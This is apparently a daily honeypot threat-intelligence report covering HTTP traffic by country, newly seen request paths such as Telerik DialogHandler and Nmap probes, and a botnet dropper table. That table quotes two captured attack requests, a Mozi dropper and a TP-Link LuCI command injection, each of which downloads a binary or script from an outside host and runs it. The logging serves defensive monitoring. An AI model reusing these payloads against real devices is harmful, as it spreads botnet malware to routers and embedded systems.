Report: 2025-05-08

Author
Shoggoth Industries

Daily Report: 2025-05-08

Executive summary

Interaction report on the HTTP services of various honeypots around the world.

executive_summary

In today’s report, we detected 2 stage 1 IP address(es), linked to 2 dropper URL(s).

There are 32 new requests that have never been observed before (these were added to the monitored request database).

A total of 1283 requests were recorded during the day, originating from 2 different countries, with a peak of 326 requests coming from BG.

ot_simplified_report

Simplified report for medium-level interactions with honeypots that mimic industrial systems (website loading, or interactions with the website). For more, contact us at social@shoggoth.industries.

| source_country | targeted_country |
|---|---|
| US | Dubai |

botnet_dropper_behaviour

| remote_addr | request |
|---|---|
| 70.40.41.125 | 27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0 |
| 45.95.147.209 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+sh%3B+wget+http%3A%2F%2F212.81.47.226%2Fsh%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh%60) HTTP/1.1 |

request

The requests listed here are those that have not yet been integrated into the request database.

| index | number_of_occurence | request |
|---|---|---|
| 258 | 2 | PROPFIND / HTTP/1.1 |
| 284 | 1 | GET /_wpresources/RadEditorSharePoint/6.9.0.0__1f131a624888eeed/Resources/Telerik.Web.UI.DialogHandler.aspx HTTP/1.1 |
| 285 | 1 | GET /app_master/telerik.web.ui.dialoghandler.aspx HTTP/1.1 |
| 286 | 1 | GET /en/providers/htmleditorproviders/telerik/telerik.web.ui.dialoghandler.aspx HTTP/1.1 |
| 287 | 1 | GET /desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.aspx HTTP/1.1 |
| 288 | 1 | GET /desktopmodules/dnnwerk.radeditorprovider/dialoghandler.aspx HTTP/1.1 |
| 289 | 1 | GET /dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx HTTP/1.1 |
| 290 | 1 | GET /ajaxpro/AjaxPro.Services.ProfileService,AjaxPro.2.ashx HTTP/1.1 |
| 304 | 1 | GET /bLWW HTTP/1.1 |
| 307 | 1 | GET /nmaplowercheck1746701387 HTTP/1.1 |
| 311 | 1 | GET /health HTTP/1.1 |
| 314 | 1 | GET /NmapUpperCheck1746701387 HTTP/1.1 |
| 320 | 1 | GET /Nmap/folder/check1746701387 HTTP/1.1 |
| 391 | 1 | GET /Assets/Telerik.Web.UI.DialogHandler.aspx HTTP/1.1 |
| 392 | 1 | GET /DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx HTTP/1.1 |
| 393 | 1 | GET /providers/htmleditorproviders/telerik/telerik.web.ui.dialoghandler.aspx HTTP/1.1 |
| 394 | 1 | GET /Telerik.Web.UI.DialogHandler.aspx HTTP/1.1 |
| 395 | 1 | GET /common/admin/Jobs2/Telerik.Web.UI.DialogHandler.aspx HTTP/1.1 |
| 396 | 1 | GET /common/admin/Calendar/Telerik.Web.UI.DialogHandler.aspx HTTP/1.1 |
| 397 | 1 | GET /AsiCommon/Controls/ContentManagement/ContentDesigner/Telerik.Web.UI.DialogHandler.aspx HTTP/1.1 |
| 398 | 1 | GET /Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx HTTP/1.1 |
| 399 | 1 | GET /cms/portlets/Telerik.Web.UI.DialogHandler.aspx HTTP/1.1 |
| 400 | 1 | GET /sitecore/shell/RadControls/Spell/Telerik.Spell.DialogHandler.aspx HTTP/1.1 |
| 401 | 1 | GET /common/admin/PhotoGallery2/Telerik.Web.UI.DialogHandler.aspx HTTP/1.1 |
| 402 | 1 | GET /_controls/responsive/Telerik.Web.UI.DialogHandler.aspx HTTP/1.1 |
| 403 | 1 | GET /controls/events/v2/Telerik.Web.UI.DialogHandler.aspx HTTP/1.1 |
| 415 | 1 | GET /nmaplowercheck1746679829 HTTP/1.1 |
| 416 | 1 | NJMT / HTTP/1.1 |
| 417 | 1 | GET /NmapUpperCheck1746679829 HTTP/1.1 |
| 418 | 1 | GET /Nmap/folder/check1746679829 HTTP/1.1 |
| 427 | 1 | GET /c2fa HTTP/1.1 |
| 428 | 1 | GET /dKFh HTTP/1.1 |

country_iso_code

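| index | number_of_occurence | country_iso_code |
|---|---|---|
| 0 | 326 | BG |
| 1 | 235 | US |
| 2 | 155 | NL |
| 3 | 155 | GB |
| 4 | 88 | SG |
| 5 | 73 | RU |
| 6 | 41 | DE |
| 7 | 40 | PL |
| 8 | 25 | SC |
| 9 | 14 | AZ |
| 10 | 13 | CA |
| 11 | 11 | KR |
| 12 | 10 | PT |
| 13 | 10 | IN |
| 14 | 9 | CN |
| 15 | 9 | GH |
| 16 | 8 | IL |
| 17 | 7 | AO |
| 18 | 6 | AL |
| 19 | 6 | BR |
| 20 | 6 | UA |
| 21 | 6 | HK |
| 22 | 5 | LT |
| 23 | 5 | RO |
| 24 | 3 | BE |
| 25 | 3 | VN |
| 26 | 2 | ID |
| 27 | 2 | JP |
| 28 | 2 | ZM |
| 29 | 1 | SE |
| 30 | 1 | IT |
| 31 | 1 | NZ |
| 32 | 1 | DK |
| 33 | 1 | TR |
| 34 | 1 | SA |
| 35 | 1 | FR |
| 36 | 1 | EE |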
